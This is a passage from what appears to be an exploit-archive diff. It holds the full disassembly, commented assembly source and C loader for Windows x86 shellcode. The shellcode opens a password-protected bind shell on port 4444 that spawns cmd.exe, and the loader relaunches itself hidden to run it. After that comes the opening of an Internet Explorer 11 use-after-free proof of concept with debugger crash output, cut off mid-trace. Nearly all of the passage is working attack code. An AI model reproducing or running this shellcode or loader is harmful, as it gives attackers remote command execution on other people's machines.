2c: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax)
|
||||
33: 75 eb jne 20 <g>
|
||||
35: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax)
|
||||
3c: 75 e2 jne 20 <g>
|
||||
3e: 8b 73 1c mov 0x1c(%ebx),%esi
|
||||
41: 01 fe add %edi,%esi
|
||||
43: 8b 0c 96 mov (%esi,%edx,4),%ecx
|
||||
46: 01 f9 add %edi,%ecx
|
||||
48: 83 ec 50 sub $0x50,%esp
|
||||
4b: 8d 34 24 lea (%esp),%esi
|
||||
4e: 89 0e mov %ecx,(%esi)
|
||||
50: 99 cltd
|
||||
51: 68 73 41 41 41 push $0x41414173
|
||||
56: 88 54 24 02 mov %dl,0x2(%esp)
|
||||
5a: 68 6f 63 65 73 push $0x7365636f
|
||||
5f: 68 74 65 50 72 push $0x72506574
|
||||
64: 68 43 72 65 61 push $0x61657243
|
||||
69: 8d 14 24 lea (%esp),%edx
|
||||
6c: 52 push %edx
|
||||
6d: 57 push %edi
|
||||
6e: ff d1 call *%ecx
|
||||
70: 83 c4 10 add $0x10,%esp
|
||||
73: 89 46 04 mov %eax,0x4(%esi)
|
||||
76: 99 cltd
|
||||
77: 68 65 73 73 41 push $0x41737365
|
||||
7c: 88 54 24 03 mov %dl,0x3(%esp)
|
||||
80: 68 50 72 6f 63 push $0x636f7250
|
||||
85: 68 45 78 69 74 push $0x74697845
|
||||
8a: 8d 14 24 lea (%esp),%edx
|
||||
8d: 52 push %edx
|
||||
8e: 57 push %edi
|
||||
8f: ff 16 call *(%esi)
|
||||
91: 83 c4 0c add $0xc,%esp
|
||||
94: 89 46 08 mov %eax,0x8(%esi)
|
||||
97: 99 cltd
|
||||
98: 52 push %edx
|
||||
99: 68 61 72 79 41 push $0x41797261
|
||||
9e: 68 4c 69 62 72 push $0x7262694c
|
||||
a3: 68 4c 6f 61 64 push $0x64616f4c
|
||||
a8: 8d 14 24 lea (%esp),%edx
|
||||
ab: 52 push %edx
|
||||
ac: 57 push %edi
|
||||
ad: ff 16 call *(%esi)
|
||||
af: 83 c4 0c add $0xc,%esp
|
||||
b2: 99 cltd
|
||||
b3: 68 6c 6c 6c 6c push $0x6c6c6c6c
|
||||
b8: 88 54 24 02 mov %dl,0x2(%esp)
|
||||
bc: 68 33 32 2e 64 push $0x642e3233
|
||||
c1: 68 77 73 32 5f push $0x5f327377
|
||||
c6: 8d 14 24 lea (%esp),%edx
|
||||
c9: 52 push %edx
|
||||
ca: ff d0 call *%eax
|
||||
cc: 83 c4 0c add $0xc,%esp
|
||||
cf: 97 xchg %eax,%edi
|
||||
d0: 8b 5f 3c mov 0x3c(%edi),%ebx
|
||||
d3: 01 fb add %edi,%ebx
|
||||
d5: 8b 5b 78 mov 0x78(%ebx),%ebx
|
||||
d8: 01 fb add %edi,%ebx
|
||||
da: 8b 5b 1c mov 0x1c(%ebx),%ebx
|
||||
dd: 01 fb add %edi,%ebx
|
||||
df: 99 cltd
|
||||
e0: 66 ba c8 01 mov $0x1c8,%dx
|
||||
e4: 8b 04 13 mov (%ebx,%edx,1),%eax
|
||||
e7: 01 f8 add %edi,%eax
|
||||
e9: 89 46 0c mov %eax,0xc(%esi)
|
||||
ec: 8b 43 50 mov 0x50(%ebx),%eax
|
||||
ef: 01 f8 add %edi,%eax
|
||||
f1: 89 46 10 mov %eax,0x10(%esi)
|
||||
f4: 8b 43 04 mov 0x4(%ebx),%eax
|
||||
f7: 01 f8 add %edi,%eax
|
||||
f9: 89 46 14 mov %eax,0x14(%esi)
|
||||
fc: 8b 03 mov (%ebx),%eax
|
||||
fe: 01 f8 add %edi,%eax
|
||||
100: 89 46 18 mov %eax,0x18(%esi)
|
||||
103: 8b 43 30 mov 0x30(%ebx),%eax
|
||||
106: 01 f8 add %edi,%eax
|
||||
108: 89 46 1c mov %eax,0x1c(%esi)
|
||||
10b: 8b 43 08 mov 0x8(%ebx),%eax
|
||||
10e: 01 f8 add %edi,%eax
|
||||
110: 89 46 20 mov %eax,0x20(%esi)
|
||||
113: 8b 43 3c mov 0x3c(%ebx),%eax
|
||||
116: 01 f8 add %edi,%eax
|
||||
118: 89 46 24 mov %eax,0x24(%esi)
|
||||
11b: 66 ba 88 01 mov $0x188,%dx
|
||||
11f: 8b 04 13 mov (%ebx,%edx,1),%eax
|
||||
122: 01 f8 add %edi,%eax
|
||||
124: 89 46 28 mov %eax,0x28(%esi)
|
||||
127: 8b 43 48 mov 0x48(%ebx),%eax
|
||||
12a: 01 f8 add %edi,%eax
|
||||
12c: 89 46 2c mov %eax,0x2c(%esi)
|
||||
12f: 99 cltd
|
||||
130: 8d 4e 30 lea 0x30(%esi),%ecx
|
||||
133: c6 01 02 movb $0x2,(%ecx)
|
||||
136: 66 c7 41 02 11 5c movw $0x5c11,0x2(%ecx)
|
||||
13c: 89 51 04 mov %edx,0x4(%ecx)
|
||||
13f: 89 51 08 mov %edx,0x8(%ecx)
|
||||
142: 89 51 0c mov %edx,0xc(%ecx)
|
||||
145: 8d 4e 40 lea 0x40(%esi),%ecx
|
||||
148: c7 01 45 6e 74 65 movl $0x65746e45,(%ecx)
|
||||
14e: c7 41 04 72 20 70 61 movl $0x61702072,0x4(%ecx)
|
||||
155: c7 41 08 73 73 20 63 movl $0x63207373,0x8(%ecx)
|
||||
15c: c7 41 0c 6f 64 65 3a movl $0x3a65646f,0xc(%ecx)
|
||||
163: 99 cltd
|
||||
164: 66 ba 90 01 mov $0x190,%dx
|
||||
168: 29 d4 sub %edx,%esp
|
||||
16a: 8d 0c 24 lea (%esp),%ecx
|
||||
16d: 83 c2 72 add $0x72,%edx
|
||||
170: 51 push %ecx
|
||||
171: 52 push %edx
|
||||
172: ff 56 0c call *0xc(%esi)
|
||||
175: 99 cltd
|
||||
176: 52 push %edx
|
||||
177: 52 push %edx
|
||||
178: 52 push %edx
|
||||
179: b2 06 mov $0x6,%dl
|
||||
17b: 52 push %edx
|
||||
17c: 99 cltd
|
||||
17d: 42 inc %edx
|
||||
17e: 52 push %edx
|
||||
17f: 42 inc %edx
|
||||
180: 52 push %edx
|
||||
181: ff 56 28 call *0x28(%esi)
|
||||
184: 97 xchg %eax,%edi
|
||||
185: 99 cltd
|
||||
186: 42 inc %edx
|
||||
187: 52 push %edx
|
||||
188: 8d 0c 24 lea (%esp),%ecx
|
||||
18b: 42 inc %edx
|
||||
18c: 52 push %edx
|
||||
18d: 51 push %ecx
|
||||
18e: 83 c2 02 add $0x2,%edx
|
||||
191: 52 push %edx
|
||||
192: 99 cltd
|
||||
193: 66 ba ff ff mov $0xffff,%dx
|
||||
197: 52 push %edx
|
||||
198: 57 push %edi
|
||||
199: ff 56 10 call *0x10(%esi)
|
||||
19c: 99 cltd
|
||||
19d: b2 10 mov $0x10,%dl
|
||||
19f: 52 push %edx
|
||||
1a0: 8d 4e 30 lea 0x30(%esi),%ecx
|
||||
1a3: 52 push %edx
|
||||
1a4: 51 push %ecx
|
||||
1a5: 57 push %edi
|
||||
1a6: ff 56 14 call *0x14(%esi)
|
||||
1a9: 99 cltd
|
||||
1aa: 42 inc %edx
|
||||
1ab: 52 push %edx
|
||||
1ac: 57 push %edi
|
||||
1ad: ff 56 1c call *0x1c(%esi)
|
||||
1b0: 99 cltd
|
||||
1b1: 8d 5e 30 lea 0x30(%esi),%ebx
|
||||
1b4: 89 13 mov %edx,(%ebx)
|
||||
1b6: 89 53 04 mov %edx,0x4(%ebx)
|
||||
1b9: 89 53 08 mov %edx,0x8(%ebx)
|
||||
1bc: 89 53 0c mov %edx,0xc(%ebx)
|
||||
|
||||
000001bf <a>:
|
||||
1bf: 99 cltd
|
||||
1c0: b2 10 mov $0x10,%dl
|
||||
1c2: 52 push %edx
|
||||
1c3: 8d 0c 24 lea (%esp),%ecx
|
||||
1c6: 8d 5e 30 lea 0x30(%esi),%ebx
|
||||
1c9: 51 push %ecx
|
||||
1ca: 53 push %ebx
|
||||
1cb: 57 push %edi
|
||||
1cc: ff 56 18 call *0x18(%esi)
|
||||
1cf: 99 cltd
|
||||
1d0: 50 push %eax
|
||||
1d1: 52 push %edx
|
||||
1d2: b2 10 mov $0x10,%dl
|
||||
1d4: 52 push %edx
|
||||
1d5: 8d 4e 40 lea 0x40(%esi),%ecx
|
||||
1d8: 51 push %ecx
|
||||
1d9: 50 push %eax
|
||||
1da: ff 56 2c call *0x2c(%esi)
|
||||
1dd: 58 pop %eax
|
||||
1de: 89 c3 mov %eax,%ebx
|
||||
1e0: 99 cltd
|
||||
1e1: 52 push %edx
|
||||
1e2: b2 10 mov $0x10,%dl
|
||||
1e4: 52 push %edx
|
||||
1e5: 8d 4e 40 lea 0x40(%esi),%ecx
|
||||
1e8: 51 push %ecx
|
||||
1e9: 50 push %eax
|
||||
1ea: ff 56 24 call *0x24(%esi)
|
||||
1ed: 8d 4e 40 lea 0x40(%esi),%ecx
|
||||
1f0: 81 39 64 61 6d 6e cmpl $0x6e6d6164,(%ecx)
|
||||
1f6: 75 5e jne 256 <kick_out>
|
||||
1f8: 81 79 04 5f 69 74 21 cmpl $0x2174695f,0x4(%ecx)
|
||||
1ff: 75 55 jne 256 <kick_out>
|
||||
201: 81 79 08 24 24 23 23 cmpl $0x23232424,0x8(%ecx)
|
||||
208: 75 4c jne 256 <kick_out>
|
||||
20a: 81 79 0c 40 3b 2a 23 cmpl $0x232a3b40,0xc(%ecx)
|
||||
211: 75 43 jne 256 <kick_out>
|
||||
213: 89 df mov %ebx,%edi
|
||||
215: 83 ec 10 sub $0x10,%esp
|
||||
218: 8d 1c 24 lea (%esp),%ebx
|
||||
21b: 99 cltd
|
||||
21c: 57 push %edi
|
||||
21d: 57 push %edi
|
||||
21e: 57 push %edi
|
||||
21f: 52 push %edx
|
||||
220: 52 push %edx
|
||||
221: b2 ff mov $0xff,%dl
|
||||
223: 42 inc %edx
|
||||
224: 52 push %edx
|
||||
225: 99 cltd
|
||||
226: 52 push %edx
|
||||
227: 52 push %edx
|
||||
228: 52 push %edx
|
||||
229: 52 push %edx
|
||||
22a: 52 push %edx
|
||||
22b: 52 push %edx
|
||||
22c: 52 push %edx
|
||||
22d: 52 push %edx
|
||||
22e: 52 push %edx
|
||||
22f: 52 push %edx
|
||||
230: b2 44 mov $0x44,%dl
|
||||
232: 52 push %edx
|
||||
233: 8d 0c 24 lea (%esp),%ecx
|
||||
236: 99 cltd
|
||||
237: 68 63 6d 64 41 push $0x41646d63
|
||||
23c: 88 54 24 03 mov %dl,0x3(%esp)
|
||||
240: 8d 04 24 lea (%esp),%eax
|
||||
243: 53 push %ebx
|
||||
244: 51 push %ecx
|
||||
245: 52 push %edx
|
||||
246: 52 push %edx
|
||||
247: 52 push %edx
|
||||
248: 42 inc %edx
|
||||
249: 52 push %edx
|
||||
24a: 99 cltd
|
||||
24b: 52 push %edx
|
||||
24c: 52 push %edx
|
||||
24d: 50 push %eax
|
||||
24e: 52 push %edx
|
||||
24f: ff 56 04 call *0x4(%esi)
|
||||
252: 50 push %eax
|
||||
253: ff 56 08 call *0x8(%esi)
|
||||
|
||||
00000256 <kick_out>:
|
||||
256: 53 push %ebx
|
||||
257: ff 56 20 call *0x20(%esi)
|
||||
25a: 8d 4e 40 lea 0x40(%esi),%ecx
|
||||
25d: c7 01 45 6e 74 65 movl $0x65746e45,(%ecx)
|
||||
263: c7 41 04 72 20 70 61 movl $0x61702072,0x4(%ecx)
|
||||
26a: c7 41 08 73 73 20 63 movl $0x63207373,0x8(%ecx)
|
||||
271: c7 41 0c 6f 64 65 3a movl $0x3a65646f,0xc(%ecx)
|
||||
278: e9 42 ff ff ff jmp 1bf <a>
|
||||
*/
|
||||
|
||||
|
||||
/*
|
||||
section .text
|
||||
global _start
|
||||
_start:
|
||||
|
||||
cdq
|
||||
mov eax,[fs:edx+0x30] ;PEB
|
||||
mov eax,[eax+0xc] ;PEB.Ldr
|
||||
mov esi,[eax+0x14] ;PEB.Ldr->InMemOrderModuleList
|
||||
lodsd
|
||||
xchg esi,eax
|
||||
lodsd
|
||||
mov edi,[eax+0x10] ;kernel32.dll base address
|
||||
|
||||
mov ebx,[edi+0x3c]
|
||||
add ebx,edi
|
||||
mov ebx,[ebx+0x78]
|
||||
add ebx,edi
|
||||
|
||||
mov esi,[ebx+0x20]
|
||||
add esi,edi
|
||||
|
||||
g:
|
||||
inc edx
|
||||
lodsd
|
||||
add eax,edi
|
||||
cmp dword [eax],'GetP'
|
||||
jne g
|
||||
cmp dword [eax+4],'rocA'
|
||||
jne g
|
||||
cmp dword [eax+8],'ddre'
|
||||
jne g
|
||||
|
||||
mov esi,[ebx+0x1c]
|
||||
add esi,edi
|
||||
|
||||
mov ecx,[esi+edx*4]
|
||||
add ecx,edi
|
||||
|
||||
sub esp,80
|
||||
lea esi,[esp]
|
||||
|
||||
mov [esi],dword ecx ;GetProcAddress() 0
|
||||
|
||||
;-----------------------
|
||||
;address CreateProcessA()
|
||||
|
||||
cdq
|
||||
push 0x41414173
|
||||
mov [esp+2],byte dl
|
||||
push 0x7365636f
|
||||
push 0x72506574
|
||||
push 0x61657243
|
||||
|
||||
lea edx,[esp]
|
||||
|
||||
push edx
|
||||
push edi
|
||||
|
||||
call ecx
|
||||
|
||||
;----------------------
|
||||
add esp,16
|
||||
mov [esi+4],dword eax ;CreateProcessA() 4
|
||||
;-------------------------------
|
||||
;address ExitProcess()
|
||||
cdq
|
||||
push 0x41737365
|
||||
mov [esp+3],byte dl
|
||||
push 0x636f7250
|
||||
push 0x74697845
|
||||
|
||||
lea edx,[esp]
|
||||
|
||||
push edx
|
||||
push edi
|
||||
|
||||
call [esi]
|
||||
|
||||
;-------------------------------
|
||||
add esp,12
|
||||
mov [esi+8],dword eax ;ExitProcess() 8
|
||||
;----------------------------------
|
||||
cdq
|
||||
push edx
|
||||
push 0x41797261
|
||||
push 0x7262694c
|
||||
push 0x64616f4c
|
||||
lea edx,[esp]
|
||||
push edx
|
||||
push edi
|
||||
|
||||
call [esi]
|
||||
|
||||
add esp,12
|
||||
;------------------------
|
||||
;loading ws2_32.dll
|
||||
cdq
|
||||
push 0x6c6c6c6c
|
||||
mov [esp+2],byte dl
|
||||
push 0x642e3233
|
||||
push 0x5f327377
|
||||
|
||||
lea edx,[esp]
|
||||
push edx
|
||||
|
||||
|
||||
call eax
|
||||
|
||||
;---------------------------------
|
||||
add esp,12
|
||||
|
||||
xchg edi,eax
|
||||
|
||||
|
||||
mov ebx,[edi+0x3c]
|
||||
add ebx,edi
|
||||
mov ebx,[ebx+0x78]
|
||||
add ebx,edi
|
||||
|
||||
mov ebx,[ebx+0x1c]
|
||||
add ebx,edi
|
||||
|
||||
cdq
|
||||
mov dx,456
|
||||
|
||||
mov eax,[ebx+edx]
|
||||
add eax,edi
|
||||
|
||||
mov [esi+12],dword eax ;WSAStartup() 12
|
||||
|
||||
mov eax,[ebx+80]
|
||||
add eax,edi
|
||||
|
||||
mov [esi+16],dword eax ;setsockopt() 16
|
||||
|
||||
mov eax,[ebx+4]
|
||||
add eax,edi
|
||||
|
||||
mov [esi+20],dword eax ;bind() 20
|
||||
|
||||
mov eax,[ebx]
|
||||
add eax,edi
|
||||
|
||||
mov [esi+24],dword eax ;accept() 24
|
||||
|
||||
mov eax,[ebx+48]
|
||||
add eax,edi
|
||||
|
||||
mov [esi+28],dword eax ;listen() 28
|
||||
|
||||
mov eax,[ebx+8]
|
||||
add eax,edi
|
||||
|
||||
mov [esi+32],dword eax ;closesocket() 32
|
||||
|
||||
mov eax,[ebx+60]
|
||||
add eax,edi
|
||||
|
||||
mov [esi+36],dword eax ;recv() 36
|
||||
|
||||
mov dx,392
|
||||
mov eax,[ebx+edx]
|
||||
add eax,edi
|
||||
|
||||
mov [esi+40],dword eax ;WSASocketA() 40
|
||||
|
||||
|
||||
|
||||
mov eax,[ebx+72]
|
||||
add eax,edi
|
||||
|
||||
mov [esi+44],dword eax ;send() 44
|
||||
|
||||
;---------------------------------
|
||||
cdq
|
||||
lea ecx,[esi+48]
|
||||
mov [ecx],byte 2
|
||||
mov [ecx+2],word 0x5c11
|
||||
mov [ecx+4],edx
|
||||
mov [ecx+8],edx
|
||||
mov [ecx+12],edx
|
||||
|
||||
lea ecx,[esi+64]
|
||||
mov [ecx],dword 'Ente'
|
||||
mov [ecx+4],dword 'r pa'
|
||||
mov [ecx+8],dword 'ss c'
|
||||
mov [ecx+12],dword 'ode:'
|
||||
|
||||
;-----------------------------------
|
||||
|
||||
;WSAStartup(514,&WSADATA)
|
||||
|
||||
cdq
|
||||
mov dx,400
|
||||
sub esp,edx
|
||||
lea ecx,[esp]
|
||||
add edx,114
|
||||
|
||||
push ecx
|
||||
push edx
|
||||
|
||||
call [esi+12]
|
||||
|
||||
;--------------------------------
|
||||
;---------------------------
|
||||
;;WSASocketA(2,1,6,0,0,0)
|
||||
cdq
|
||||
|
||||
push edx
|
||||
push edx
|
||||
push edx
|
||||
mov dl,6
|
||||
push edx
|
||||
cdq
|
||||
inc edx
|
||||
push edx
|
||||
inc edx
|
||||
push edx
|
||||
|
||||
call [esi+40]
|
||||
|
||||
xchg edi,eax ;SOCKET
|
||||
;-------------------------------------
|
||||
;setsockopt(SOCKET,0xffff,4,&1,2)
|
||||
cdq
|
||||
inc edx
|
||||
push edx
|
||||
lea ecx,[esp]
|
||||
|
||||
inc edx
|
||||
push edx
|
||||
push ecx
|
||||
add edx,2
|
||||
push edx
|
||||
cdq
|
||||
mov dx,0xffff
|
||||
push edx
|
||||
push edi
|
||||
|
||||
call [esi+16]
|
||||
;----------------------
|
||||
;bind(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)
|
||||
|
||||
cdq
|
||||
mov dl,16
|
||||
push edx
|
||||
lea ecx,[esi+48]
|
||||
|
||||
push edx
|
||||
push ecx
|
||||
push edi
|
||||
|
||||
call [esi+20]
|
||||
;----------------------------
|
||||
;listen(SOCKET,1)
|
||||
cdq
|
||||
inc edx
|
||||
push edx
|
||||
push edi
|
||||
|
||||
call [esi+28]
|
||||
|
||||
|
||||
cdq
|
||||
lea ebx,[esi+48]
|
||||
|
||||
mov [ebx],edx
|
||||
mov [ebx+4],edx
|
||||
mov [ebx+8],edx
|
||||
mov [ebx+12],edx
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
a:
|
||||
;-----------------------------
|
||||
;accept(SOCKET,(struct sockaddr *)&struct sockaddr_in,&16)
|
||||
cdq
|
||||
mov dl,16
|
||||
push edx
|
||||
lea ecx,[esp]
|
||||
lea ebx,[esi+48]
|
||||
|
||||
push ecx
|
||||
push ebx
|
||||
push edi
|
||||
|
||||
call [esi+24]
|
||||
;---------------------------------
|
||||
;send(SOCKET,char *a[],16,0)
|
||||
cdq
|
||||
|
||||
push eax
|
||||
|
||||
push edx
|
||||
mov dl,16
|
||||
push edx
|
||||
lea ecx,[esi+64]
|
||||
push ecx
|
||||
push eax
|
||||
|
||||
call [esi+44]
|
||||
;-----------------------
|
||||
pop eax
|
||||
|
||||
;recv(SOCKET,char *a[],16,0)
|
||||
mov ebx,eax
|
||||
|
||||
cdq
|
||||
push edx
|
||||
mov dl,16
|
||||
push edx
|
||||
lea ecx,[esi+64]
|
||||
push ecx
|
||||
push eax
|
||||
|
||||
call [esi+36]
|
||||
;----------------------------------
|
||||
|
||||
lea ecx,[esi+64]
|
||||
|
||||
cmp dword [ecx],'damn'
|
||||
jne kick_out
|
||||
cmp dword [ecx+4],'_it!'
|
||||
jne kick_out
|
||||
cmp dword [ecx+8],'$$##'
|
||||
jne kick_out
|
||||
cmp dword [ecx+12],'@;*#'
|
||||
jne kick_out
|
||||
|
||||
;password-> damn_it!$$##@;*#
|
||||
|
||||
|
||||
mov edi,ebx
|
||||
sub esp,16
|
||||
lea ebx,[esp]
|
||||
|
||||
cdq
|
||||
push edi
|
||||
push edi
|
||||
push edi
|
||||
|
||||
push edx
|
||||
push edx
|
||||
|
||||
mov dl,255
|
||||
inc edx
|
||||
push edx
|
||||
cdq
|
||||
|
||||
push edx
|
||||
push edx
|
||||
push edx
|
||||
push edx
|
||||
push edx
|
||||
|
||||
push edx
|
||||
push edx
|
||||
push edx
|
||||
push edx
|
||||
push edx
|
||||
|
||||
mov dl,68
|
||||
push edx
|
||||
lea ecx,[esp]
|
||||
|
||||
cdq
|
||||
|
||||
push 'cmdA'
|
||||
mov [esp+3],byte dl
|
||||
lea eax,[esp]
|
||||
|
||||
;-------------------------------------------------
|
||||
push ebx
|
||||
push ecx
|
||||
|
||||
push edx
|
||||
push edx
|
||||
push edx
|
||||
|
||||
inc edx
|
||||
push edx
|
||||
cdq
|
||||
|
||||
push edx
|
||||
push edx
|
||||
|
||||
push eax
|
||||
push edx
|
||||
|
||||
call [esi+4]
|
||||
push eax
|
||||
call [esi+8]
|
||||
|
||||
|
||||
|
||||
kick_out:
|
||||
push ebx
|
||||
call [esi+32]
|
||||
|
||||
lea ecx,[esi+64]
|
||||
mov [ecx],dword 'Ente'
|
||||
mov [ecx+4],dword 'r pa'
|
||||
mov [ecx+8],dword 'ss c'
|
||||
mov [ecx+12],dword 'ode:'
|
||||
|
||||
jmp a
|
||||
*/
|
||||
|
||||
|
||||
|
||||
#include<windows.h>
|
||||
#include<stdio.h>
|
||||
#include<shellapi.h>
|
||||
#include<stdlib.h>
|
||||
|
||||
char shellcode[]="\x99\x64\x8b\x42\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x78\x10\x8b\x5f\x3c\x01\xfb\x8b\x5b\x78\x01\xfb\x8b\x73\x20\x01\xfe\x42\xad\x01\xf8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xfe\x8b\x0c\x96\x01\xf9\x83\xec\x50\x8d\x34\x24\x89\x0e\x99\x68\x73\x41\x41\x41\x88\x54\x24\x02\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x8d\x14\x24\x52\x57\xff\xd1\x83\xc4\x10\x89\x46\x04\x99\x68\x65\x73\x73\x41\x88\x54\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x14\x24\x52\x57\xff\x16\x83\xc4\x0c\x89\x46\x08\x99\x52\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x8d\x14\x24\x52\x57\xff\x16\x83\xc4\x0c\x99\x68\x6c\x6c\x6c\x6c\x88\x54\x24\x02\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x8d\x14\x24\x52\xff\xd0\x83\xc4\x0c\x97\x8b\x5f\x3c\x01\xfb\x8b\x5b\x78\x01\xfb\x8b\x5b\x1c\x01\xfb\x99\x66\xba\xc8\x01\x8b\x04\x13\x01\xf8\x89\x46\x0c\x8b\x43\x50\x01\xf8\x89\x46\x10\x8b\x43\x04\x01\xf8\x89\x46\x14\x8b\x03\x01\xf8\x89\x46\x18\x8b\x43\x30\x01\xf8\x89\x46\x1c\x8b\x43\x08\x01\xf8\x89\x46\x20\x8b\x43\x3c\x01\xf8\x89\x46\x24\x66\xba\x88\x01\x8b\x04\x13\x01\xf8\x89\x46\x28\x8b\x43\x48\x01\xf8\x89\x46\x2c\x99\x8d\x4e\x30\xc6\x01\x02\x66\xc7\x41\x02\x11\x5c\x89\x51\x04\x89\x51\x08\x89\x51\x0c\x8d\x4e\x40\xc7\x01\x45\x6e\x74\x65\xc7\x41\x04\x72\x20\x70\x61\xc7\x41\x08\x73\x73\x20\x63\xc7\x41\x0c\x6f\x64\x65\x3a\x99\x66\xba\x90\x01\x29\xd4\x8d\x0c\x24\x83\xc2\x72\x51\x52\xff\x56\x0c\x99\x52\x52\x52\xb2\x06\x52\x99\x42\x52\x42\x52\xff\x56\x28\x97\x99\x42\x52\x8d\x0c\x24\x42\x52\x51\x83\xc2\x02\x52\x99\x66\xba\xff\xff\x52\x57\xff\x56\x10\x99\xb2\x10\x52\x8d\x4e\x30\x52\x51\x57\xff\x56\x14\x99\x42\x52\x57\xff\x56\x1c\x99\x8d\x5e\x30\x89\x13\x89\x53\x04\x89\x53\x08\x89\x53\x0c\x99\xb2\x10\x52\x8d\x0c\x24\x8d\x5e\x30\x51\x53\x57\xff\x56\x18\x99\x50\x52\xb2\x10\x52\x8d\x4e\x40\x51\x50\xff\x56\x2c\x58\x89\xc3\x99\x52\xb2\x10\x52\x8d\x4e\x40\x51\x50\xff\x56\x24\x8d\x4e\x40\x81\x39\x64\x61\x6d\x6e\x75\x5e\x81\x79\x04\x5f\x69\x74\x21\x75\x55\x81\x79\x08\x24\x24\x23\x23\x75\x4c\x81\x79\x0c\x40\x3b\x2a\x23\x75\x43\x89\xdf\x83\xec\x10\x8d\x1c\x24\x99\x57\x57\x57\x52\x52\xb2\xff\x42\x52\x99\x52\x52\x52\x52\x52\x52\x52\x52\x52\x52\xb2\x44\x52\x8d\x0c\x24\x99\x68\x63\x6d\x64\x41\x88\x54\x24\x03\x8d\x04\x24\x53\x51\x52\x52\x52\x42\x52\x99\x52\x52\x50\x52\xff\x56\x04\x50\xff\x56\x08\x53\xff\x56\x20\x8d\x4e\x40\xc7\x01\x45\x6e\x74\x65\xc7\x41\x04\x72\x20\x70\x61\xc7\x41\x08\x73\x73\x20\x63\xc7\x41\x0c\x6f\x64\x65\x3a\xe9\x42\xff\xff\xff";
|
||||
|
||||
int main(int i,char *a[])
|
||||
{
|
||||
|
||||
int mode;
|
||||
|
||||
|
||||
|
||||
if(i==1)
|
||||
mode=1;
|
||||
else
|
||||
mode=atoi(a[1]);
|
||||
|
||||
switch(mode)
|
||||
{
|
||||
|
||||
|
||||
case 78:
|
||||
(* (int(*)())shellcode )();
|
||||
break;
|
||||
|
||||
case 1:
|
||||
ShellExecute(NULL,NULL,a[0],"78",NULL,0);
|
||||
default:
|
||||
break;
|
||||
}
|
||||
|
||||
|
||||
return 0;
|
||||
}
|
107
platforms/windows/dos/40374.html
Executable file
107
platforms/windows/dos/40374.html
Executable file
|
@ -0,0 +1,107 @@
|
|||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
|
||||
<meta http-equiv="Expires" content="0" />
|
||||
<meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
|
||||
<meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
|
||||
<meta http-equiv="Pragma" content="no-cache" />
|
||||
<style type="text/css">
|
||||
body{
|
||||
background-color:lime;
|
||||
font-color:red;
|
||||
};
|
||||
</style>
|
||||
<script type='text/javascript'></script>
|
||||
<script type="text/javascript" language="JavaScript">
|
||||
/*
|
||||
# Exploit Title: Internet Explorer 11 Use After Free
|
||||
# Date: 05/09/2016 - 11/09/2016
|
||||
# Exploit Author: Marcin Ressel
|
||||
# Vendor Homepage: https://www.microsoft.com/pl-pl/
|
||||
# Version: 11.0.9600.18482
|
||||
# Tested on: Windows 7 (x64)
|
||||
|
||||
######################################################################################
|
||||
|
||||
0:014> g
|
||||
(13a8.9b8): Access violation - code c0000005 (!!! second chance !!!)
|
||||
eax=2f66abb0 ebx=00000001 ecx=2fbc8f08 edx=7ef8d000 esi=2fbc8f08 edi=2fbc8f08
|
||||
eip=6d754a45 esp=1feac660 ebp=1feac674 iopl=0 nv up ei pl nz na po nc
|
||||
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
|
||||
MSHTML!CElement::SecurityContext+0x25:
|
||||
6d754a45 8b80b8000000 mov eax,dword ptr [eax+0B8h] ds:002b:2f66ac68=????????
|
||||
0:014> d @eax
|
||||
2f66abb0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
|
||||
2f66abc0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
|
||||
2f66abd0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
|
||||
2f66abe0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
|
||||
2f66abf0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
|
||||
2f66ac00 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
|
||||
2f66ac10 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
|
||||
2f66ac20 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
|
||||
0:014> kb
|
||||
ChildEBP RetAddr Args to Child
|
||||
1feac660 6d5e7c69 6d5e7500 1feac690 2fbc8f08 MSHTML!CElement::SecurityContext+0x25
|
||||
1feac674 6d5e75cf 2fbc8f08 2fbc8f08 2fbc8f08 MSHTML!CMediaElement::RemoveFromPlayToElementTracker+0x1d
|
||||
1feac688 6d5e7bee 1feac6a0 6d5e7bd0 00000004 MSHTML!CMediaElement::Shutdown+0xdc
|
||||
1feac698 6d5e7b1c 48cfae30 50d00bb0 4542dbd0 MSHTML!CMediaElement::OnMarkupTearDown+0x1e
|
||||
1feac6c4 6d3b23dc 00000000 4542dbd0 50d00bb0 MSHTML!CMarkup::InvokeMarkupTearDownCallbacks+0xc0
|
||||
1feac6d8 6d3b22c9 00000001 00000001 341a8bb0 MSHTML!CMarkup::TearDownMarkupHelper+0xe4
|
||||
1feac700 6d3adf1f 00000001 00000001 1feac7d0 MSHTML!CMarkup::TearDownMarkup+0x58
|
||||
